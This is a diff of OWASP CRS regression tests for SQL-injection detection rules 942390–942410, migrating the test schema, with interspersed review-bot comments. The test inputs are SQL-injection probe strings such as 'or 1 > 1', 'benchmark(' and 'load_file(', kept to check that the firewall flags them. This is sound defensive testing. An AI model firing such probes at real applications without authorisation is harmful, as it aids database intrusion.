- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?var=sdfsd%27or%201%20%3e%201"
- version: HTTP/1.0
- output:
- log_contains: id "942390"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?var=sdfsd%27or%201%20%3e%201"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942390"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
index 7845fb918..31616f078 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
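Review bot: `description: None` in the meta block is kept as a context line, and as a plain scalar YAML reads it as the string "None", not as a null or an empty value; since this hunk already rewrites the block (dropping `enabled` and `name`), it is the place to either give the key real content, e.g. `description: "Regression tests for rule 942390"`, or drop it if the new schema permits. The same leftover survives in the 942400.yaml hunk and in the 942410.yaml hunk that follows. With `name: 942390.yaml` removed and the test renamed from `942390-1` to `test_id: 1`, the test's identity presumably now comes from the file name plus `test_id`; any override or exclusion list that still keys on the old `942390-1` style title would need the same migration, which is worth confirming.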
@@ -2,42 +2,38 @@ meta:
 author: "Christian S.J. Peron, azurit"
 description: None
- enabled: true
- name: 942400.yaml
 tests:
- - test_title: 942400-1
+ - test_id: 1
 desc: "SQL Injection Attack"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # variable name boundary attacks
- data: "and '5'orig_var_datavarname=whatever"
- version: HTTP/1.0
- output:
- log_contains: id "942400"
- - test_title: 942400-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # variable name boundary attacks
+ data: "and '5'orig_var_datavarname=whatever"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942400"
+ - test_id: 2
 desc: "SQL Injection Attack - false positive"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # variable name boundary attacks
- data: "and 7 oranges"
- version: HTTP/1.0
- output:
- no_log_contains: id "942400"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # variable name boundary attacks
+ data: "and 7 oranges"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942400"
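Review bot: The false-positive stage for `test_id: 2` asserts only `no_log_contains: id "942400"`, which also passes when the request never reaches the rule (for example a 4xx rejected by the server before inspection), so the negative check is weaker than it reads; pairing it with an expected `status: 200` next to `no_log_contains` would make the assertion meaningful, provided the runner's output schema accepts it. The `# variable name boundary attacks` comment is now repeated verbatim in both stages; a one-line note above `test_id: 2` stating that `and 7 oranges` must not trip the boundary check would document the intent of the negative case directly.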
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
index 75f566775..83030ad0a 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
@@ -2,2012 +2,1892 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942410.yaml tests: - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP 
CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-30 - desc: "SQL 
Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - 
log_contains: id "942410" - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%28" 
- version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-49 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-54 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-59 - desc: "SQL Injection Attack" - 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 